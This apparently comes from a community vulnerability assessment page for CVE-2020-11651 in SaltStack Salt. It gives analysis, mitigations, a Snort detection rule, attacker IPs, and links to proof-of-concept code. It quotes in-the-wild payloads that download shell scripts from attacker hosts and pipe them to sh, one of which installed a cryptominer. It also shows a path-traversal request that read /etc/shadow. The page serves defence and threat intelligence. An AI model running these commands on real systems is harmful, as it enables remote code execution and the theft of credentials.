Very High
CVE-2020-11651
CVE-2020-11651
Description
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Add Assessment
Technical Analysis
Overview
For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.
If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.
This requires multiple socket requests. one to read the key and then additional requests to create jobs.
Proof Of Concept
This POC was tested on SaltStack 2019.2.0
As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – https://github.com/kevthehermit/CVE-2020-11651
The POC and others I am sure will appear shortly has the following functionality
- Read the root key
- Read and Write files on the Salt Master
- Construct a payload to gain full RCE as root on any connected Minion
This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/
Mitigations:
Patch to the latest versions and do not expose theses ports to the external network.
Detections
examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. the return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.
Immersive Labs have released a basic python script to parse all these job files – https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/
# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p ��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0::::: bin:!::0::::: daemon:!::0::::: adm:!::0::::: lp:!::0::::: sync:!::0::::: shutdown:!::0::::: halt:!::0::::: mail:!::0::::: news:!::0::::: uucp:!::0::::: operator:!::0::::: man:!::0::::: postmaster:!::0::::: cron:!::0::::: ftp:!::0::::: sshd:!::0::::: at:!::0::::: squid:!::0::::: xfs:!::0::::: games:!::0::::: postgres:!::0::::: cyrus:!::0::::: vpopmail:!::0::::: ntp:!::0::::: smmsp:!::0::::: guest:!::0::::: nobody:!::0::::: salt:!:18164:0:99999:7:::
Snort Rule:
alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)
On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'
In the wild
The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.
- 95.181.178.108
- 89.151.132.112
- 89.27.255.58
- 104.244.76.189
- 95.213.139.92
- 81.92.218.74
- 178.44.87.133
Payloads
The following Payloads have been observed
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
Technical Analysis
Nothing to add to the technical analysis by the others.
Dropping by to note that:
DigiCert’s CT Log 2’s key used to sign SCTs was compromised 2020-05-03 — https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM (wayback doesn’t seem to be able to handle ggroups links, so no archive link).
Ghost was impacted on 2020-05-03 https://status.ghost.org/incidents/tpn078sqk973 / https://web.archive.org/web/20200504011743/https://status.ghost.org/incidents/tpn078sqk973
Lineage OS was impacted on 2020-05-03 https://status.lineageos.org/issues/5eae596b4a0ebd114676545f / https://web.archive.org/web/20200504114159/https://status.lineageos.org/issues/5eae596b4a0ebd114676545f
we’ve been seeing twice 1-2 monthly, low-grade inventory scans for hosts exposing port 4506 through March 2020 but have registered a notable increase (usually
<10, now 50+) in unique sources since the vulnerability was disclosed. Looks like ~30% of those are known benign scanners doing new cataloging.
Technical Analysis
Version 2019.2.3 or less is vulnerable. Easy to exploit.
“Exploitation
We expect that any competent hacker will be able to create 100% reliable exploits for these issues in under 24 hours. Due to reliability and simplicity of exploitation, F-Secure will not be providing proof-of-concept exploit code as this would only harm any users who are slow to patch. In this case, we will leave exploitation as an exercise for the reader.”
https://labs.f-secure.com/advisories/saltstack-authorization-bypass
Testcase to be able to reverse and develop exploit for this RCE
https://github.com/saltstack/salt/blob/3d99b108c58ebaa174967d898a27764f416a8ec1/tests/integration/master/test_clear_funcs.py
Technical Analysis
I had been waiting for more details on this, and F-Secure delivered. I have little to add to the other excellent assessments, but from a cursory review of the advisory and the code, this looks very easy to reproduce and is already being exploited in the wild as a result.
Poked at this for a couple hours and seem to be able to disclose the root key so far. Welp.
Metasploit has two ongoing (WIP) modules in this PR: https://github.com/rapid7/metasploit-framework/pull/13401.
https://github.com/rapid7/metasploit-framework/pull/13401 is now feature-complete.
CVSS V3 Severity and Metrics
General Information
Vendors
- canonical,
- debian,
- opensuse,
- saltstack,
- vmware
Products
- application remote collector 7.5.0,
- application remote collector 8.0.0,
- debian linux 10.0,
- debian linux 8.0,
- debian linux 9.0,
- leap 15.1,
- salt,
- ubuntu linux 16.04,
- ubuntu linux 18.04
Metasploit Modules
Exploited in the Wild
References
Advisory
Miscellaneous
Active exploits in the wild have now been observed.
https://twitter.com/KevTheHermit/status/1256873327991443456
Payload is a CryptoMiner.
Base Command
"(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"Miner Download –
https://bitbucket.org/samk12dd/git/src/master/salt-storeAs Public PoCs are now out. I am sharing mine here. as well.
https://github.com/kevthehermit/CVE-2020-11651
Excellent work, @kevthehermit! Seems a lot of PoCs are using the Python
saltmodule, same as the integration test, but you figured out your own MessagePack payloads. :–)